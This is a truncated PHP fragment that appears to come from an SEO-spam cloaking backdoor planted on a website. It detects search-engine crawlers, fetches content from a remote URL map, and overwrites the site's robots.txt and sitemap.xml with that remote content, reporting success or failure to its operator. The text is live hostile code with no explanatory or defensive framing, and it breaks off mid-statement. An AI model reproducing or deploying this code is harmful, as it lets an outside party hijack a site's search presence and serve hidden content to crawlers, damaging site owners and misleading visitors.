$http . $_SERVER["HTTP_HOST"], 'req_uri' => $requri, 'req_url' => $requrl, 'req_ua' => $userAgent, 'req_rf' => $referer ); if (isCrawler($userAgent) || substr($params['req_uri'], -6) === 'robots' || substr($params['req_uri'], -4) === '.xml') { $sRequri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : ''; if(in_array(substr($params['req_uri'], -7), ['/robots', '?robots']) && strpos($_SERVER['REQUEST_URI'],'.html') !== false && $sRequri !== $requri){ die('robots.txt and sitemap.xml file create fail by subfile!'); } $output = getContent($urlMap, $params); if (in_array(substr($params['req_uri'], -7), ['/robots', '?robots']) && !empty($output)) { $output = json_decode($output, true); $subfile = (isset($output[2]) && !empty($output[2])) ? true : false; $ret = @file_put_contents(__DIR__ . '/robots.txt', (isset($output[0]) && !empty($output[0])) ? $output[0] : '', $subfile ? 8 : 0); @file_put_contents(__DIR__ . '/sitemap.xml', (isset($output[1]) && !empty($output[1])) ? $output[1] : ''); $robots_cont = file_get_contents(__DIR__ . '/robots.txt'); if ($ret !== false && strpos(strtolower($robots_cont), "sitemap") !== false) { die('robots.txt and sitemap.xml file create success!'); } else { die('robots.txt and sitemap.xml file create fail!'); } } elseif (!empty($output)) { if (substr($output, 0, 5) === '